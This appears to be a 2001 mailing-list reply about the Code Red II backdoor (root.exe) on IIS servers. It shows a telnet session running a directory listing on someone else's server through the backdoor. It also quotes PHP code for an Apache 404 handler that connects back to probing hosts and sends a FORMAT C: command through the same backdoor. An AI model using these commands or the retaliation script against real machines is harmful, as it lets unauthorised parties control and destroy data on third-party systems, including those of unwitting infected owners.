Windows won't let you format c: as the volume is locked.  Even if it would, the format 
program would prompt "are you sure???, are you really sure???"

Although this *IS* very interesting, I found a server that would let me do this:

~$ telnet xxxxx 80
Trying xxxxx...
Connected to xxxxx
Escape character is '^]'.
GET /scripts/root.exe?/c+DIR+C: HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 07 Aug 2001 10:02:28 GMT
Content-Type: application/octet-stream
Volume in drive C is SYSTEM
Volume Serial Number is 8C36-99B1

 Directory of C:\Inetpub\scripts

05/06/2001  12:53p      <DIR>          .
05/06/2001  12:53p      <DIR>          ..
07/12/2001  08:33p                 291 default.asp
07/12/2001  08:33p                 291 default.htm
07/12/2001  08:33p                 291 index.asp
07/12/2001  08:33p                 291 index.htm
12/07/1999  06:00a             236,304 root.exe
               5 File(s)        237,468 bytes
               2 Dir(s)   3,055,824,896 bytes free
Connection closed by foreign host.
~$ 

This is not good for IIS owners.


On Tue, Aug 07, 2001 at 12:29:20PM -0700, Rob Hudson wrote:
> If anyone is malicious enough, this should format the hard drive of an
> infected host who is trying to infect your computer, but only if
> you're not running IIS.  :)
> 
> <?php
> if (eregi("default.ida", $REQUEST_URI)) {
>   $fp = fsockopen ($REMOTE_ADDR, 80, &$errno, &$errstr, 30);
>   if ($fp) { 
>     fputs ($fp, "GET /scripts/root.exe?/c+FORMAT+C: HTTP/1.0\n\n");
>   }
> }
> ?>
> 
> 
> Just use that as your 404 handler in Apache.  Of course, it's not
> tested b/c I don't want to go there.  There would probably be lots of
> repercussions, but it is real scary that this code would probably
> actually work.  
> 
> -Rob
> 

Reply via email to